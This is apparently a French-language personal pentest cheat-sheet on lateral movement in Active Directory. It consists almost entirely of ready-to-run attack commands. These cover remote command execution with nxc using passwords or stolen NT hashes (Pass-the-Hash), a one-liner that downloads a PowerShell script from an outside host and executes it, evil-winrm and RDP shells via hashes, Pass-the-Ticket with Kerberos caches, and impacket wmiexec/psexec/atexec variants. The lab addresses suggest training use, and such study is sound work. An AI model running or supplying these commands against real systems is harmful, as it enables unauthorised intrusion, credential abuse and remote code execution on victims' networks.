Whackermelon
notes / active-directory / mouvement-lateral-ad

Mouvement latéral AD

sommaire

Exécution à distance — nxc (le plus simple)

nxc smb 10.10.10.20 -u user -p pass -x whoami
nxc smb 10.10.10.20 -u administrateur -H <NThash> -x whoami          # Pass-the-Hash
nxc smb 10.10.10.20 -u user -p pass -X "iwr http://10.10.14.5/s.ps1|iex"
nxc smb 10.10.10.20 -u user -p pass --exec-method wmiexec -x whoami   # choisir la methode

Shell interactif

evil-winrm -i 10.10.10.20 -u user -p pass        # ou -H <NThash> (PtH)
xfreerdp /u:user /p:pass /v:10.10.10.20 /dynamic-resolution +clipboard
xfreerdp /u:user /pth:<NThash> /v:10.10.10.20    # PtH RDP (Restricted Admin)

Pass-the-Ticket

export KRB5CCNAME=ticket.ccache ; klist
nxc smb 10.10.10.20 -k --use-kcache -x whoami

Impacket — SEULEMENT si nxc/evil-winrm ne suffisent pas

impacket-wmiexec domaine.local/user:pass@10.10.10.20    # shell semi-interactif discret
impacket-psexec  domaine.local/user:pass@10.10.10.20    # SYSTEM, bruyant
# variantes : impacket-atexec / smbexec / dcomexec  ;  PtH : -hashes :<NThash>